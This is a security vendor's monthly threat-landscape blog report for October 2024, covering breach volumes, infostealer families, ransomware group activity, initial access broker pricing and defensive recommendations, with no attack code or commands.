Back to Blog
Reports12 min readNov 1, 2024

Monthly Threat Landscape Report: October 2024

Key trends in data breaches, malware campaigns, and threat actor activity from the past month.

Threat Intel Team

SocialEye

October 2024 Threat Intelligence Summary

This monthly report provides an overview of significant threat intelligence developments observed through the SocialEye platform during October 2024.

Key Statistics

Metric October 2024 September 2024 Change
New breach records indexed 847M 623M +36%
Unique stealer log entries 12.4M 9.8M +27%
New combo lists identified 156 134 +16%
Underground forum posts monitored 45K 41K +10%

Major Breach Events

Healthcare Sector Under Siege

October saw a continuation of aggressive targeting against healthcare organizations:

Notable Incidents:

  • Regional hospital chain: 2.3M patient records
  • Health insurance provider: 890K member records
  • Medical laboratory network: 450K records including test results

Pattern Analysis:

  • Primary vector: Compromised VPN credentials
  • Ransomware groups claiming responsibility: BlackCat, LockBit
  • Average time to detection: 23 days

E-Commerce Breaches

Pre-holiday shopping season preparations were disrupted by multiple e-commerce compromises:

  • Three major retailers experienced Magecart-style attacks
  • Estimated 340K payment cards harvested
  • Increase in checkout page skimmers detected

Infostealer Trends

Lumma Stealer Dominance

Lumma has emerged as the leading infostealer family in October:

Distribution by Family:

  • Lumma: 34%
  • RedLine: 28%
  • Raccoon: 19%
  • Vidar: 12%
  • Other: 7%

Notable Lumma Capabilities

Recent Lumma variants include enhanced:

  • Browser cookie extraction (including Chrome's encrypted cookies)
  • Cryptocurrency wallet targeting (expanded to 40+ wallet types)
  • Session token harvesting for SaaS applications
  • Anti-analysis techniques to evade sandboxes

Distribution Campaigns

Observed vectors this month:

  1. Fake CAPTCHA pages: Users tricked into running PowerShell commands
  2. Cracked software: Adobe, Microsoft Office, gaming tools
  3. YouTube tutorials: Links to "tools" in video descriptions
  4. Discord malware: Compromised game modifications

Credential Intelligence

Exposed Corporate Credentials

SocialEye tracked significant corporate exposure:

  • Fortune 500 companies: 12% showed new credential exposure
  • Technology sector most affected (34% of corporate exposures)
  • Average of 2,100 new corporate credentials surfacing daily

Password Analysis

From October's breach data:

Most Common Passwords:

  1. password123 (still!)
  2. Company name + year
  3. Qwerty variations
  4. Welcome1
  5. Seasonal passwords (Fall2024)

Positive Trends:

  • Slight increase in password manager adoption indicators
  • More unique passwords in newer breaches

Threat Actor Activity

Ransomware Groups

Most Active Groups (by victim count):

  1. LockBit 3.0 - 89 claimed victims
  2. BlackCat/ALPHV - 67 claimed victims
  3. Play - 45 claimed victims
  4. Akira - 38 claimed victims

Initial Access Broker Activity

Increased activity from Initial Access Brokers (IABs) selling:

  • VPN credentials: Average price $2,400
  • RDP access: Average price $1,800
  • Web shell access: Average price $650

Nation-State Activity

Observed campaigns attributed to:

  • APT groups: Targeting defense contractors, think tanks
  • Focus areas: Intellectual property, policy documents
  • TTPs: Supply chain compromise, watering hole attacks

Geographic Trends

Most Affected Regions (by breach volume)

  1. United States: 42%
  2. European Union: 23%
  3. United Kingdom: 8%
  4. India: 7%
  5. Brazil: 5%

Emerging Targets

Increased targeting observed in:

  • Southeast Asian financial services
  • Middle Eastern energy sector
  • Latin American government entities

Recommendations

Immediate Actions

  1. Review VPN security: Implement MFA, monitor for credential exposure
  2. Employee awareness: Alert staff to ongoing phishing campaigns
  3. E-commerce monitoring: Extra vigilance during holiday preparation
  4. Healthcare sector: Prioritize network segmentation

Strategic Priorities

  1. Implement continuous credential monitoring
  2. Enhance detection for stealer malware
  3. Review third-party access controls
  4. Tabletop exercises for ransomware scenarios

Looking Ahead: November Predictions

Based on current trends, we anticipate:

  • Increased holiday-themed phishing: Black Friday, Cyber Monday lures
  • Retail targeting: Point-of-sale and e-commerce focus
  • Tax preparation: Early tax-related phishing (some regions)
  • Year-end ransomware push: Groups seeking to meet quotas

About This Report

This report is compiled from SocialEye's threat intelligence platform, monitoring:

  • 400+ data sources
  • Real-time breach data ingestion
  • Underground forum analysis
  • Stealer log aggregation

Subscribe to receive monthly threat reports directly to your inbox. Sign up for alerts in your dashboard.

For detailed indicators of compromise (IOCs) from this month's threats, contact your SocialEye account representative or reach out to our team.

Ready to get started?

Start protecting your organization with real-time threat intelligence. 100 free lookups to get started.

Start Free Trial
SocialEye | Enterprise Social Intelligence Platform